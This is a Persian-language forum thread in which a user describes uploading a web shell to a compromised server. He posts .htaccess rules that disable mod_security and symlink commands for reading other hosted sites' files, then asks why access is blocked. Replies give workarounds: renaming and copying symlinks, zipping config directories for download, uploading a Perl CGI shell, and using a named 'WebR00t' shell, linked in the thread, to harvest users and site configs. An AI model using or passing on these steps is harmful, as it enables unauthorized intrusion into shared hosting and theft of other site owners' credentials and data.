SpareNet Servers Advertising & Link Exchange

اطلاعیه

بستن
هیچ اطلاعیه ای هنوز ایجاد نشده است .

مشکل در سیملینک و درخواست راهنمایی

بستن
X

• فیلتر
  • زمان
  • نمایش
پاک کردن همه
نوشته‌های جدید

• مشکل در سیملینک و درخواست راهنمایی

سلام دوستان
    من با سیملینک مشکل دارم.
    در سروری شل آپلود کردم (البته از طریق پنل مدیریت یک سایت). Safemode رو خاموش کرده و اجرای توابع رو هم فعال کردم با استفاده از سه فایل php.ini و ini.php و .htaccess
    کدی که در داخل .htaccess نوشتم اینه:[php]#Generated By Sole Sad and Invisible
    <IfModule mod_security.c>
    Sec------Engine Off
    Sec------ScanPOST Off
    </IfModule>

[/php]
    در فولدر جاری یک فولدر به نام sym ساختم و از دستور زیر استفاده کردم:[php]ln -s / root.txt

[/php]
    یک فولدر به نام root.txt ساخته شد که وقتی از طریق شل بر روی این فولدر کلیک می کنم یک لیست از فایل ها و فولدرها به نمایش گذاشته میشه.
    جالب اینجاست وقتی که آدرس root.txt رو در مرورگر می زنم هیچ چیز نمایش نمیده و فقط یک صفحه ی خالی میاد در حالی که از طریق شل فولدرها و فایل های زیادی به نمایش گذاشته میشه.[php]http://www.site.com/files/sym/root.txt

[/php]
    بعد اومدم و در داخل فولدر sym یک فایل .htaccess ایجاد کرده و کدهای زیر رو توش قرار داده و بهش پرم 777 دادم.[php]Options all
     DirectoryIndex Sux.html
     AddType text/plain .php
     AddHandler server-parsed .php
     AddType text/plain .html
     AddHandler txt .html
     Require None
     Satisfy Any

[/php]
    باز هم وقتی آدرس زیر رو می زنم باز هم صفحه ی سفید میاد.[php]http://www.site.com/files/sym/root.txt

[/php]
    وقتی که از طریق شل بر روی root.txt کلیک می کنم فولدرها و فایل ها به نمایش گذاشته میشن. وقتی که روی فولدر home کلیک می کنم بهم پیغام Access Denied میده و هیچ کاری نمی تونم انجام بدم. نه میشه فایل درست کرد نه میشه فایل آپلود کرد و نه میشه دستوری رو اجرا کرد. به نظر شما من چه طور می تونم در این سرور از سیملینک استفاده کنم. ممنون میشم اگه راهنمایی کنید.
    راستی یادم رفت یه چیزی رو بگم:
    یک بار هم اومدم این دستور رو نوشتم(به جای کلمه ی user نام کاربری سایت هدف رو نوشتم:[php]ln -s /home/user/public_html/index.php test.txt

[/php]
    یک فایل به نام test.txt ساخته شد که وقتی آدرس زیر رو در مرورگر تایپ می کردم و اینتر می زدم بهم این پیغام رو میداد در حالی که فایل .htaccess رو هم در فولدر مورد نظر داشتم.[php]http://www.site.com/files/sym/root.txt

[/php][php]Forbidden
    You dont have permission to access /files/sys/test.txt on this server.
    Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.

[/php]
    ممنون میشم اگه راهنمایی کنید.
    با تقدیم احترام
    صداقت

RE: مشکل در سیملینک و درخواست راهنمایی

در مورد فایل test.txt شما چند راه حل رو میگم :
    1.
    [php]ln -s /home/user/public_html/index.php test.txt[/php]
    شما وقتی این دستور رو برای سیملینک وارد میکنیدومیگید فایل test.txt ساخته میشه ولی پرم ندارد خب حلا میایم با دستور زیر:
    [php]cp test.txt test1.txt[/php]
    (همان کپی کردن هست)حالا میریم فایل test1.txt رو میبینیم اگر مشکل حل شد که خوبه اگر نه راه بعدی
    میتونید پسوند txt رو تغییر بدید
    مثل:
    ln -s /home/user/public_html/index.php test.xml
    ln -s /home/user/public_html/index.php test.avi
    ln -s /home/user/public_html/index.php test
    2.
    شما وقتی کانفیگو حالا چه بصورت دستی یا با اسکریپت در یک دایرکتری ذخیره میکنید میتونید اون دایرکتوری با دستور زیر
    [php]zip -r file.zip directorypwd(masire dir)[/php]
    یه فایل زیپ تبدیل کنید و دانلود کنید و بعد محتویات اون رو ببینید
    3. شما میتونید فایل کانفیگو که به دست اوردید رو هم زیپ کنید و دانلود کنید یه htaccess بود که الان یادم نیست(البته اینهم یک get هست ممکنه نشه)
    روش سوم شما وقتی همون test.txt رو ساختی یک cgi.pl اپلود کن پرم بده و بعد با این شل بیا با دستور cat فایل test.txt رو بخون
    .
    .
    روش زیاد هست

نظر

سلام
      ممنون از پاسخ تون
      تمام کارهایی که گفتید انجام دادم ولی هیچ کدوم جواب نداد و بهم پیغام نداشتن پرم داد.
      با تقدیم احترام
      صداقت

نظر

از شل WebR00t  استفاده کن دردسرش کمتره
        وقتی آپلود کردی از قسمت CGI Shell یوزر هارو بخون
        بعد تو قسمت Config پیست کن
        بعد تو دایرکتوری ConfigWeb سیو میشن
        میتونی بخونی یوزر های سایت هارو
        اگرم پرم هم نداشت باید پرم بدی

اینم شل وب روت
        http://s5.picofile.com/file/8129155418/webr00t.php.html